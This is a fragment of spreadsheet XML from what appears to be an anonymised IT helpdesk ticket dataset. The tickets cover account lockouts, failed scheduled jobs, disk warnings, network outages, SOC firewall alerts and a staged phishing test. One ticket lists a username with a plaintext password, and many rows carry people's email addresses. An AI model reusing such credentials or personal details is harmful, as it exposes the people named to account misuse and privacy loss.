1) autoresolve any events related to attacks against the microsoft windows http.sys kernel driver directly to the portal (no explicit notification and events will be available for reporting purposes in the portal). this is most likely the best choice if you are not running the application being targeted or if you are running a non-vulnerable version of the application
2) ticket only escalation via a medium priority ticket (no phone call) for each unique source ip address for attacks against the microsoft windows http.sys kernel driver (this may generate a relatively large volume of incident tickets)
3) full escalation via a high priority ticket and a phone call for each unique source ip address for attacks against the microsoft windows http.sys kernel driver (this may generate a relatively large volume of incident tickets)</t>
  </si>
  <si>
    <t>54.96.80.216/att-singapore-asa.company.com-1 device generating at least 253 'internal outbreak for 7/udp' alerts within 10 m</t>
  </si>
  <si>
    <t>dsw in33572131_x000D_
_x000D_
incident overview_x000D_
=========================_x000D_
we are seeing your 54.96.80.216/att-singapore-asa.company.com-1 device generating at least 253 'internal outbreak for 7/udp' alerts within 10 minutes, for traffic (blocked) from ewll8111148/10.44.23.17 to port 7/udp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internal reconnaissance alerts (explicit notification via a medium priority ticket (no phone call))_x000D_
2) automatically resolve internal reconnaissance alerts to the portal (no explicit notification but events will be available for reporting purposes in the portal)</t>
  </si>
  <si>
    <t>18.79.63.203/company-internal-asa.company.com-1 device generating a high volume of 'repeat outbound connection for 135/tcp' aler</t>
  </si>
  <si>
    <t>dsw in33574596_x000D_
_x000D_
we are seeing your 18.79.63.203/company-internal-asa.company.com-1 device generating a high volume of 'repeat outbound connection for 135/tcp' alerts for traffic (blocked) from apul8812210/10.24.12.213 to port 135/tcp (remote procedure call (rpc)) of external host 211.136.113.1.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secureworks soc</t>
  </si>
  <si>
    <t>dsw in33401594_x000D_
_x000D_
incident overview_x000D_
=========================_x000D_
we are seeing your 18.79.63.203/company-internal-asa.company.com-1 device generating a high volume of 'repeat outbound connection for 135/tcp' alerts for traffic (blocked) from rqvl8516442/10.24.15.172 to port 135/tcp (remote procedure call (rpc)) of external host 198.105.254.63.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</si>
  <si>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114 occurrences of your firewall company-european-asa.company.com-1/80.71.06.702 dropping traffic sourcing from HostName_25/10.16.16.</t>
  </si>
  <si>
    <t>dsw in32075851_x000D_
_x000D_
=========================_x000D_
incident overview_x000D_
=========================_x000D_
we have detected at least 114 occurrences of your firewall company-european-asa.company.com-1/80.71.06.702 dropping traffic sourcing from HostName_25/15.69.85.2812 and destined to port 445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t>
  </si>
  <si>
    <t xml:space="preserve">unable to load hr_tool etime application </t>
  </si>
  <si>
    <t xml:space="preserve">
recently got a new computer and ever since have not been able to load the hr_tool etime application.</t>
  </si>
  <si>
    <t>[hw] filesystem near capacity - h:(HostName_894)</t>
  </si>
  <si>
    <t>dsw in33644259_x000D_
_x000D_
related events: _x000D_
event id: 307315976_x000D_
event summary: [hw] filesystem near capacity - h:_x000D_
occurrence count: 1_x000D_
event count: 1_x000D_
_x000D_
host and connection information_x000D_
source ip: 18.38.85.961_x000D_
source hostname: HostName_894_x000D_
connection directionality: internal_x000D_
_x000D_
device information_x000D_
device ip: 18.38.85.961_x000D_
device name: HostName_894.company.company.com_x000D_
log time: 2016-08-18 at 18:03:40 utc_x000D_
vendor classification: none_x000D_
vendor priority: 1_x000D_
windows event id: 2013_x000D_
type: warning_x000D_
username: n/a_x000D_
_x000D_
scwx event processing information_x000D_
sherlock rule id (sle): 566425_x000D_
inspector rule id: 2132464_x000D_
inspector event id: 030920674_x000D_
agent id: 110620_x000D_
_x000D_
event detail:_x000D_
note: by default, this alert is generated when capacity reaches 90%. (_x000D_
aug 18 18:03:40 18.38.85.961 mswineventlog 1 system 2566671 thu aug 18 18:03:40 2016 2013 srv n/a n/a warning HostName_894.company.company.com none  the h: disk is at or near capacity.  you may need to delete some files. 3776</t>
  </si>
  <si>
    <t>login failure</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jashyht.usa@company.com_x000D_
_x000D_
good afternoon,_x000D_
i am unable to open my drive? here is a screen shot of the error: i am unaware of any password as i am able to open up all other drives. i assume it has something to do with an email i received late yesterday (see 2nd screen shot below) which i was unable to login to (see third screen shot):_x000D_
please advise or correct._x000D_
[cid:image002.jpg@01d1fa07.159311d0]_x000D_
_x000D_
[cid:image006.jpg@01d1fa07.159311d0]_x000D_
_x000D_
_x000D_
[cid:image007.jpg@01d1fa07.159311d0]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>rzvtduoj vsxefcub</t>
  </si>
  <si>
    <t>connected the default printer</t>
  </si>
  <si>
    <t>esmvgkhb crybuied</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1315 failed in job_scheduler at: 08/19/2016 10:35:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1315 failed in job_scheduler at: 08/19/2016 10:35:00</t>
  </si>
  <si>
    <t>new prospect accounts within the crm system</t>
  </si>
  <si>
    <t xml:space="preserve">
the issue is...
i have created some new prospect accounts within the crm system
after 2-3days it still hasn't allocated them a erp ~
contact # : 
</t>
  </si>
  <si>
    <t>blue screen error.</t>
  </si>
  <si>
    <t>njcxmlbf svlmrqjd</t>
  </si>
  <si>
    <t>outlook not responding due to crm error</t>
  </si>
  <si>
    <t xml:space="preserve">from: nwfodmhc exurcwkm 
sent: friday, august 19, 2016 6:16 pm
to: johthryu ko; nwfodmhc exurcwkm
subject: re: sab : fw: account information updated
hello johthryu,
this is a mail from company. you can click on the link to access it.
aorthyme rnsuipbk
global service organization (gso)
  did you know?
ticketing_tool has an extensive self-help knowledgebase with easy to use troubleshooting and how-to articles. 
these have been contributed by it teams as well as by our customers, every time they open a request or an incident with it. so, go ahead and follow the rabbit (click on the image to open the knowledgebase) to explore how you can help yourself with your it issue!
we appreciate your feedback, please leave a comment on the article you visit or write to the gso.
global service organization:
| | help@company.com  
-----original message-----
from: johthryu ko 
sent: friday, august 19, 2016 2:25 pm
to: nwfodmhc exurcwkm
subject: sab : fw: account information updated
hi it experts,
pla see below. not sure what it is and therefore not using it.
best </t>
  </si>
  <si>
    <t>user locked out of erp SID_34 erp</t>
  </si>
  <si>
    <t>fdnohtiy hxdfuplb</t>
  </si>
  <si>
    <t>spam or not ?</t>
  </si>
  <si>
    <t xml:space="preserve">your user account has been updated in ancile uperform. you can log on here: </t>
  </si>
  <si>
    <t>erp SID_34 account lockout</t>
  </si>
  <si>
    <t>new user id</t>
  </si>
  <si>
    <t>mcpgwduj swvpgiaq</t>
  </si>
  <si>
    <t xml:space="preserve">from: shhkioaprhkuoash ms _x000D_
sent: friday, august 19, 2016 5:07 pm_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: amar : fw: your mobile device is temporarily blocked from synchronizing using exchange activesync until your administrator usas it access._x000D_
importance: high_x000D_
_x000D_
hello,_x000D_
_x000D_
request you to  configure outlook to my new iphone i received today._x000D_
_x000D_
with </t>
  </si>
  <si>
    <t>e4 license activated. office has to be upgraded to 2016</t>
  </si>
  <si>
    <t xml:space="preserve">
contact number .  pc service tag h52gv32
summary:i'm not hearing sound from my 2:1 laptop when planning a video.  i use a bluetooth earbud.</t>
  </si>
  <si>
    <t>query regarding leaves</t>
  </si>
  <si>
    <t>ktsulemz wsgoykba</t>
  </si>
  <si>
    <t>unable to scroll down ie pages</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_ap1 failed in job_scheduler at: 08/19/2016 09:23:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_ap1 failed in job_scheduler at: 08/19/2016 09:23:00</t>
  </si>
  <si>
    <t>engineering tool does not open.</t>
  </si>
  <si>
    <t>engineering tool does not open._x000D_
error log attached.</t>
  </si>
  <si>
    <t>ticket update inplant_851643</t>
  </si>
  <si>
    <t>when opening business_client, getting the "microsoft.net framdntyework 4.5 not installed" error.</t>
  </si>
  <si>
    <t>ernczpho qkmgvoys</t>
  </si>
  <si>
    <t>skype does not open.</t>
  </si>
  <si>
    <t>telephony_software phone system</t>
  </si>
  <si>
    <t>since the new telephony_software update i am now missing the icon on my desktop.  can i have it put back on?</t>
  </si>
  <si>
    <t>reset passwords for patrcja szpilewska using password_management_tool password reset.</t>
  </si>
  <si>
    <t>company-ap-chn-apac-2960-access-sw01 at apac - (m&amp;c) - new plant location are down sicne 8:27 am et on 08/19/16</t>
  </si>
  <si>
    <t>telephony_software didn't full update. an't find the log in.</t>
  </si>
  <si>
    <t>need telephony_software to log into phone system to take calls</t>
  </si>
  <si>
    <t>new password does not work after password change.</t>
  </si>
  <si>
    <t>ticket update on inplant_852167</t>
  </si>
  <si>
    <t>ticket update</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qcxivzag.vyucbagx@gmail.com_x000D_
_x000D_
i am checking up on the status of completion for it ticket #inc1541133 - please provide an update and expected completion date?_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>pdujfybc bvfdnale</t>
  </si>
  <si>
    <t>khspqlnj npgxuzeq called for engineering tool issue</t>
  </si>
  <si>
    <t>email spam query</t>
  </si>
  <si>
    <t>hgzjtkxn xekushwi</t>
  </si>
  <si>
    <t>in erp's md04 for 6999065 it show a delivery note 9168075863.</t>
  </si>
  <si>
    <t>calling from plant plant_35. in erp's md04 for 6999065 it show a delivery note 9168075863. i deleted this yesterday and vl02n confirms the deletion. yet the delivery note still shows open in md04 with 76 pieces. will you please remove so the 76 pieces are return to stock.</t>
  </si>
  <si>
    <t>dsyzveju ivmprauh</t>
  </si>
  <si>
    <t>bfgtnyow dahqfpns</t>
  </si>
  <si>
    <t>power surge on hub port prompts</t>
  </si>
  <si>
    <t>i am getting frequent notification of power surge on hub port as attached screenshot in my laptop. kindly check and let me know any action needed to be done to resolve this.</t>
  </si>
  <si>
    <t>mobile device activation ; company provided</t>
  </si>
  <si>
    <t>erp log-in update needed urgently please!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: oslzvpgk.nhwsxgpb@gmail.com_x000D_
_x000D_
good day,_x000D_
_x000D_
please can you do a erp log-in update, so that i can get access to the erp quality management system (SID_1)_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>emails not routing from outlook into telephony_software</t>
  </si>
  <si>
    <t>i am entering this ticket to confirm that emails are not routing in from telephony_software for the cas team in north amerirtca._x000D_
there are already two tickets open for other regions with the same issue._x000D_
incident inc1543124_x000D_
incident inc1543192_x000D_
_x000D_
there is also a ticket with i3 open so they investigate from their side.  i3 ticked â€“ 846243</t>
  </si>
  <si>
    <t>vpnxjtyz wmakhpci</t>
  </si>
  <si>
    <t>support fÃ¼r osterwalder \niptbwdq csenjruz</t>
  </si>
  <si>
    <t>ess login issue : password issue.</t>
  </si>
  <si>
    <t>unlock account  email  in cell phone the users fernando fillipini, zspvxrfk xocyhnkf and fabio rghkiriuytes</t>
  </si>
  <si>
    <t xml:space="preserve">hello team,_x000D_
_x000D_
could you please unlock account  email  in cell phone the users:_x000D_
_x000D_
owdrqmit.nhdzcuji@gmail.com_x000D_
zspvxrfk.xocyhnkf@gmail.com_x000D_
gtdxpofz.xnksbrwl@gmail.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ref#prb1151148 - cannot connect to dynamic excel from msd crm</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vndwmyiz.cjwqtzai@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
please run the below commands (with administrator privilege) on the computer of the users impacted and whom its working well and send me the results for further analysis._x000D_
_x000D_
gpresult /v &gt;log.txt_x000D_
gpresult /h loghtml.html /f_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>vndwmyiz cjwqtzai</t>
  </si>
  <si>
    <t>vpn is not connecting.</t>
  </si>
  <si>
    <t>switch "company-eu-deu-germany-e-b16-gf-3550-access-sw03" at germany is down since 3:12am et 08/16.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qdbmspxf.nqdyiclk@gmail.com_x000D_
_x000D_
is this a legitimate email?_x000D_
i did not want to click on it without knowing._x000D_
</t>
  </si>
  <si>
    <t>qdbmspxf nqdyiclk</t>
  </si>
  <si>
    <t>outlook email update issue</t>
  </si>
  <si>
    <t>spam email query</t>
  </si>
  <si>
    <t>ibtfxemv roezcnmg</t>
  </si>
  <si>
    <t>userid  cccplant_119  cannot reset password. please look at the screenshot.</t>
  </si>
  <si>
    <t>hub, business_client, not working suddenly</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: cowsvzel.ryhkefwv@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
please find the attached screen shot, suddenly the hub, business_client is going blank, when i close all the tab and restarts, it works again_x000D_
_x000D_
could you please fix this ._x000D_
_x000D_
[cid:image001.png@01d1fa2e.56137811]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>: cannot open the item. text formatheywting command is not available</t>
  </si>
  <si>
    <t>ouxtpbcy vimzawtg</t>
  </si>
  <si>
    <t>collaboration_platform not synching .</t>
  </si>
  <si>
    <t>vkufbxrd zbghvyio</t>
  </si>
  <si>
    <t xml:space="preserve">system SID_34_x000D_
_x000D_
production employee pevokgiu hdywstbl idrizj from switzerland, switzerland, needs a password reset_x000D_
_x000D_
many </t>
  </si>
  <si>
    <t>brjkmwvo odxwcpie</t>
  </si>
  <si>
    <t>alte it equipment abholen . \qvncizuf ueiybanz</t>
  </si>
  <si>
    <t>monitor defekt \ewew8323542 \pvd1 \bur am orde</t>
  </si>
  <si>
    <t>please have a look at po. the terms and conditions page should only be printing as the last page to the order. not after</t>
  </si>
  <si>
    <t>please have a look at po. the terms and conditions page should only be printing as the last page to the order. not after each page.</t>
  </si>
  <si>
    <t>HostName_973 : : wrong number of instances of process wrapper.exe, expected instances gte 3 but found 0</t>
  </si>
  <si>
    <t>emails from common mailbox k-uk.moe@company.com do not appear in telephony_software workflow</t>
  </si>
  <si>
    <t>although there are emails in outlook mailbox, they do not appear in telephony_software.</t>
  </si>
  <si>
    <t>kerbmgdu yhbcquwd</t>
  </si>
  <si>
    <t>received new laptop. need outlook configuration help.</t>
  </si>
  <si>
    <t>reimbursement amount:    usd 293,34</t>
  </si>
  <si>
    <t xml:space="preserve"> i need to approve a travel expense...the following expense report has been submitted for your approval:
personnel no.:    11131936  (mahtyurch t kutgynka)
expense report no.:    2711125442
start date:    21.06.2016 00:01:00
end date:    18.07.2016 00:01:00
total costs:    usd 293,34
reimbursement amount:    usd 293,34
to review this expense report in full, please log into your universal worklist on manager self-service.
 but have no rights to view. please help.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3053 failed in job_scheduler at: 08/19/2016 03:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3053 failed in job_scheduler at: 08/19/2016 03:11:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1388 failed in job_scheduler at: 08/19/2016 02:44:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1388 failed in job_scheduler at: 08/19/2016 02:44:00</t>
  </si>
  <si>
    <t>need access to HostName_768 imts2012 folder</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ybhazlqp.zfghsxiw@gmail.com_x000D_
_x000D_
hello it team,_x000D_
_x000D_
please usa me access to imts2012 folder on server HostName_768._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>tel. 416 prÃ¼fen</t>
  </si>
  <si>
    <t>swfdvezh fpjybetd</t>
  </si>
  <si>
    <t>picking request cannot print</t>
  </si>
  <si>
    <t xml:space="preserve">hi it-team_x000D_
_x000D_
_x000D_
we have problem picking request print in plant_203._x000D_
below sale order (red so#) cannot print picking request from 17th aug._x000D_
other so# have same problem._x000D_
_x000D_
csr person print picking request print manual operate._x000D_
not automatic print it._x000D_
_x000D_
please help us aerp_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>nkiopevt gufwhdky</t>
  </si>
  <si>
    <t>please change to the japanese.</t>
  </si>
  <si>
    <t xml:space="preserve">hi,_x000D_
_x000D_
it is a screen of the sales order._x000D_
please change to the japanese._x000D_
there is also when the ship-to is displayed in japanese._x000D_
domestic customers want to display in japanese._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t xml:space="preserve">hi,_x000D_
_x000D_
one more spam mail. please check._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>disable mail functionality of payment advice</t>
  </si>
  <si>
    <t xml:space="preserve">
from: gnasmtvx cwxtsvkm 
sent: friday, august 19, 2016 10:40 am
to: pradyhtueep yyufs; nathyresh gayhtjula; lakhsynrhty p
cc: raghyvhdra najuty
subject: re: automatic payment through bank
ksp/ng,
we request you to please disable the mail functionality of payment advice for the time being until we find the solutions for both printing &amp; mail functionality.
</t>
  </si>
  <si>
    <t>msd crm-6500072137</t>
  </si>
  <si>
    <t xml:space="preserve">i can not change the qty in crm syatem, would you help me change the qty as below_x000D_
4977815 7pcs_x000D_
4977812 5pcs </t>
  </si>
  <si>
    <t>nigktly erp download for germany, plant_170 is waiting for date since more than one day.</t>
  </si>
  <si>
    <t>job hangs at step 2, this step waits for 4 files  from erp in \\edksm005\EU_tool-daten, coming in a ziped file. please check, whether the relazed erp-jobs are running properly
phone: +49 
email(skype buissness external conact) iewnguxv.bufwxeiy@gmail.com</t>
  </si>
  <si>
    <t>credit component is not working in prod author</t>
  </si>
  <si>
    <t xml:space="preserve">credit component is not working in prod author. we are getting the following error in the console: _x000D_
_x000D_
(programdnty):24 uncaught referenceerror: $xiframdntye is not definedsubmitform @ (programdnty):24(anonymous function) @ (programdnty):74dispatch @ jquery.min.js:3i @ jquery.min.js:3_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">laptop screen flickering </t>
  </si>
  <si>
    <t>hello team,_x000D_
_x000D_
my laptop monitor screen flickers more often when i start my laptop.</t>
  </si>
  <si>
    <t>business_client SID_1 search_server not working</t>
  </si>
  <si>
    <t>hi, i can find documents in engineering tool SID_1. but not in business_client SID_1.  search_server is not working. request you to check for indexing and do the needful as we need to do some uacyltoe hxgayczeing in business_client SID_1.</t>
  </si>
  <si>
    <t xml:space="preserve">job bkbackup_tool_reporting_tool_prod_inc failed in job_scheduler at: 08/19/2016 00:18:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkbackup_tool_reporting_tool_prod_inc failed in job_scheduler at: 08/19/2016 00:18:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bkbackup_tool_HostName_771_prod_full failed in job_scheduler at: 08/19/2016 00:05:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkbackup_tool_HostName_771_prod_full failed in job_scheduler at: 08/19/2016 00:05:00</t>
  </si>
  <si>
    <t>change payment terms  for emea vendors - only accounting view from v169 to v301</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: blktuiae.jzakfmhw@gmail.com_x000D_
_x000D_
dear it_x000D_
_x000D_
please create a ticket to update the emea vendor master file from v169 to v301_x000D_
move the ticket to nahytua  or another available colleague_x000D_
_x000D_
only  accounting view_x000D_
_x000D_
should be done today; very urgent_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>loan switch</t>
  </si>
  <si>
    <t>help to install the loan switch and lan cable  on newly created cubicle.</t>
  </si>
  <si>
    <t>keybankrd/accident damage hinge cover</t>
  </si>
  <si>
    <t>windows key and q key is not working and also there is accidental damage on hinge.</t>
  </si>
  <si>
    <t>unable to download files from gpts</t>
  </si>
  <si>
    <t>need uasername and password of  .telephony_software-server@company.com and .telephony_software-server@company.com for ewseditor uacyltoe hxgaycze</t>
  </si>
  <si>
    <t>emails of australia team not polling into telephony_software.  so far, they have to work via outlook._x000D_
i3 engineer need to do ewseditor uacyltoe hxgaycze and ask us to provide the username and password for the qlhmawgi sgwipoxn .telephony_software-server@company.com and .telephony_software-server@company.com .</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: nmgesubf.wugbalmy@gmail.com
hi,
   following user id (winows) is locked, pl. help.
user id : dsilvfgj,
</t>
  </si>
  <si>
    <t>the finance_app application is reporting a : down status on, HostName_1132. since 8/18/2016 5:29 pm est</t>
  </si>
  <si>
    <t>the finance_app hfm server is reporting a : down status on, HostName_1132. since 8/18/2016 5:29 pm est</t>
  </si>
  <si>
    <t>why the changed weight of the mm hasn't been copied to the sales order?</t>
  </si>
  <si>
    <t xml:space="preserve">we met the weight problem when make shipment to order 35410210, shipping plant complained the weight in d/n for some of mms still remain 11.111g( dummy weight for a new mm). but actually the weight of the mm has already be updated at mm02 to the real weight before dn created. so why system cannot carry out the new weight to the sales order? see samples mm7316889 in this s/o._x000D_
the mm changes recorded said the weight was updated from 11.111g to 500g on june 21 2016, however the s/o still keep 11.111g so when plant_185 run d/n on aug. 10 2016, the weight in d/n still shown 11.111g thus warehouse have to manual update the weight in d/n._x000D_
please verify what's the problem, </t>
  </si>
  <si>
    <t>urfdkvei bfiulzto</t>
  </si>
  <si>
    <t>è½¬å‘: ç”³è¯·é€€æ¢è´§ï¼Œè´¨é‡æŠ•è¯‰ï¼Œ external complaints 7611183180 status assigned</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: pkdavqwt.tafrmxsh@gmail.com
hello it team,
can we add receiving address, contact person &amp; tel. number on return form?
letgyo jiftg
logistics manager
e: pkdavqwt.tafrmxsh@gmail.com&lt;mailto:pkdavqwt.tafrmxsh@gmail.com&gt;
å‘ä»¶äºº: johthryugftyson hu
å‘é€æ—¶é—´: 2016å¹´8æœˆ18æ—¥ 10:22
æ”¶ä»¶äºº: letgyo jiftg; east service
æŠ„é€: simfghon wanrtyg
ä¸»é¢˜: re: ç”³è¯·é€€æ¢è´§ï¼Œè´¨é‡æŠ•è¯‰ï¼Œ external complaints 7611183180 status assigned
leoï¼Œ
please check with it if it's possible to add the warehouse person for receiving return (for plant_283:  judthti zhu and her office tel#)
to the return form attached
</t>
  </si>
  <si>
    <t>need access to global t drive</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: uycravzn.feqlznyg@gmail.com_x000D_
_x000D_
as i have been asked to put together traiyctrhbkm plvnuxmrterial for the imts show, i will need access to the global t drive (\\HostName_768\teams\imts2012\pre-show-product-training&lt;file://HostName_768/teams/imts2012/pre-show-product-training&gt;), which i do not currently have._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>uycravzn feqlznyg</t>
  </si>
  <si>
    <t>ticket update info provided to vksfrhdx njhaqket for bobj access</t>
  </si>
  <si>
    <t xml:space="preserve">from: rakthyesh ramdntythanjesh 
sent: friday, august 19, 2016 5:52 am
to: vksfrhdx njhaqket; ctzykflo evzbhgru
cc: hadfiunr vupglewt; wvdxnkhf jirecvta; anftgup nftgyair
subject: re: bobj access 
dear marftgytin,
yes,  request is  processed , completed and closed by anup
reference ticket no-ticket_no1536921
kind </t>
  </si>
  <si>
    <t>uacyltoe hxgaycze phishing email-account information updated</t>
  </si>
  <si>
    <t xml:space="preserve">from: rakthyesh ramdntythanjesh 
sent: friday, august 19, 2016 5:40 am
to: ed bigdrtyh
subject: re: account information updated
dear ed,
hope you are doing good,
please note that this is a phishing uacyltoe hxgaycze email sent out by it to uacyltoe hxgaycze our preparedness for actual scenarios.
congratuldhyation  on detecting and highlighting the issue, </t>
  </si>
  <si>
    <t xml:space="preserve">from: rakthyesh ramdntythanjesh _x000D_
sent: friday, august 19, 2016 5:39 am_x000D_
to: sunil gavasane_x000D_
subject: re: account information updated_x000D_
_x000D_
dear sunil,_x000D_
_x000D_
_x000D_
hope you are doing good,_x000D_
_x000D_
please note that this is a phishing uacyltoe hxgaycze email sent out by it to uacyltoe hxgaycze our preparedness for actual scenarios._x000D_
_x000D_
congratuldhyation  on detecting and highlighting the issue, </t>
  </si>
  <si>
    <t>see attachment discritpion does not show</t>
  </si>
  <si>
    <t>the discription shows correctly for mmaster but not for me. ??</t>
  </si>
  <si>
    <t>HostName_1003: average (4 samples) disk free on e:\ is now 14%, which is below the warning threshold (15%)</t>
  </si>
  <si>
    <t>HostName_1003: average (4 samples) disk free on e:\ is now 14%, which is below the warning threshold (15%) out of total size 100.0 gb</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_898: average (4 samples) disk free on f:\ is now 14%, which is below the warning threshold (15%) </t>
  </si>
  <si>
    <t>HostName_898: average (4 samples) disk free on f:\ is now 14%, which is below the warning threshold (15%) out of total size 8.0 gb</t>
  </si>
  <si>
    <t>emails are not being sent from the .net systemaccess applicaiton</t>
  </si>
  <si>
    <t>end-users are submitting security requests, but the approvers are not receiving emails from the systemaccess application to approve them.</t>
  </si>
  <si>
    <t>mwegknsq xzgskryv</t>
  </si>
  <si>
    <t>solicito imagens da frente do cd visando avaliar furto de motor de betoneira</t>
  </si>
  <si>
    <t>perÃ­odo: das 12h00 de 15/08 atÃ© 12h00 de 18/08/2016</t>
  </si>
  <si>
    <t xml:space="preserve">unable to log in to skype </t>
  </si>
  <si>
    <t>klsrmzvq otsdnmzk</t>
  </si>
  <si>
    <t>cgqfdotb wtefjknd</t>
  </si>
  <si>
    <t>usa: interfacetengigabitethernet1/1/1 is down since 02:30pm et on 08/17</t>
  </si>
  <si>
    <t>usa: interfacetengigabitethernet1/1/1, dr l3 connection to 6500 top(10.1.200.1) on tech-4500x-stack.company.com is down since 02:30pm et on 08/17</t>
  </si>
  <si>
    <t>engineering tool icon on the desktop</t>
  </si>
  <si>
    <t>request to reset microsoft online services password for aparecido</t>
  </si>
  <si>
    <t xml:space="preserve">from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] 
sent: thursday, august 18, 2016 10:54 pm
to: nwfodmhc exurcwkm
cc: tiyhum kuyiomar
subject: amar request to reset microsoft online services password for recsynqt.byoezmla@gmail.com
importance: high
    request to reset user's password   
   the following user in your organization has requested a password reset be performed for their account: 
â€¢ recsynqt.byoezmla@gmail.com 
â€¢ first name: aparecido 
â€¢ last name: trhsyvdur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</si>
  <si>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recsynqt byoezmla</t>
  </si>
  <si>
    <t xml:space="preserve">i'm trying to access crm through ess but getting message password has expired. i tried password_management_tool password manager </t>
  </si>
  <si>
    <t>i'm trying to access crm through ess but getting message password has expired. i tried password_management_tool password manager and unlocked all accounts. i rebooted pc. tried password manager again</t>
  </si>
  <si>
    <t>HostName_106: c:\ on server: HostName_106 is over 85% space consumed. space available: 2.8 g</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_106: volume: c:\ label:sys-HostName_106 5c38eea1 on server: HostName_106 is over  85% space consumed. space available: 2.8 g </t>
  </si>
  <si>
    <t xml:space="preserve">unable to get the sales org in distributor_tool </t>
  </si>
  <si>
    <t>bonwcpea cwfbjptn</t>
  </si>
  <si>
    <t>while trying to invoke the method java.util.list.iterator() of a null object loaded from a local variable 'locallist'</t>
  </si>
  <si>
    <t xml:space="preserve">when i try to look at a configuration for a rqfhiong zkwfqagb, i get an error - while trying to invoke the method java.util.list.iterator() of a null object loaded from a local variable 'locallist'
phone; </t>
  </si>
  <si>
    <t>telephony_software login issue - yakimp &amp; staszk</t>
  </si>
  <si>
    <t xml:space="preserve">two users have a problem with logging into telephony_software system. qlzgbjck yzwnvbjt, login staszk and djskrgae dnckipwh, login yakimp. print screens attached. will you be able to assist? </t>
  </si>
  <si>
    <t>team sproc is not converting direct team revenue to employee currency code</t>
  </si>
  <si>
    <t xml:space="preserve">unlock erp SID_34 account </t>
  </si>
  <si>
    <t>sazowuft htjrunsz</t>
  </si>
  <si>
    <t>zliatqeo nrukzxit</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to the pc </t>
  </si>
  <si>
    <t>pqkthilr uitfqsen</t>
  </si>
  <si>
    <t>businessobjects_cms : cms server watcher: server named HostName_995</t>
  </si>
  <si>
    <t xml:space="preserve">businessobjects_cms: cms server watcher: server named HostName_995 </t>
  </si>
  <si>
    <t>my erp login appears not to be working</t>
  </si>
  <si>
    <t>my erp login appears not to be working username wolfthry   password kasphryer1</t>
  </si>
  <si>
    <t>telephony_software update</t>
  </si>
  <si>
    <t>:803
summary:telephony_software update did not work</t>
  </si>
  <si>
    <t>nxgutvrb pdsvfack</t>
  </si>
  <si>
    <t>unlock account  email  in cell phone the users qasdhyzm yuglsrwx (id: nasftgcijj) and rspqvzgu vroanwhu (id: silvgtyar1)</t>
  </si>
  <si>
    <t xml:space="preserve">hello team,
could you please unlock account  email  in cell phone the users qasdhyzm yuglsrwx (id: nasftgcijj) and rspqvzgu vroanwhu (id: silvgtyar1)
</t>
  </si>
  <si>
    <t>sales org tab does not show up the field</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1387 failed in job_scheduler at: 08/18/2016 11:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1387 failed in job_scheduler at: 08/18/2016 11:11:00</t>
  </si>
  <si>
    <t>ms crm online dash bankrd /opportunities issue.</t>
  </si>
  <si>
    <t>unable to open attachments in erp</t>
  </si>
  <si>
    <t>unable to create dn</t>
  </si>
  <si>
    <t xml:space="preserve">hi it _x000D_
_x000D_
please assist o to create dn as i am not able to._x000D_
</t>
  </si>
  <si>
    <t>biwcuadk pvrgtzox</t>
  </si>
  <si>
    <t>to help jdamieul  fandyhgg</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ztdgvclp.gzcalstq@gmail.com
hello,
danghtnuell is having a connection problem.
would you please get in touch with him?
615-  office phone number.
</t>
  </si>
  <si>
    <t>account is locked</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2063b failed in job_scheduler at: 08/18/2016 10:29:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2063b failed in job_scheduler at: 08/18/2016 10:29:00</t>
  </si>
  <si>
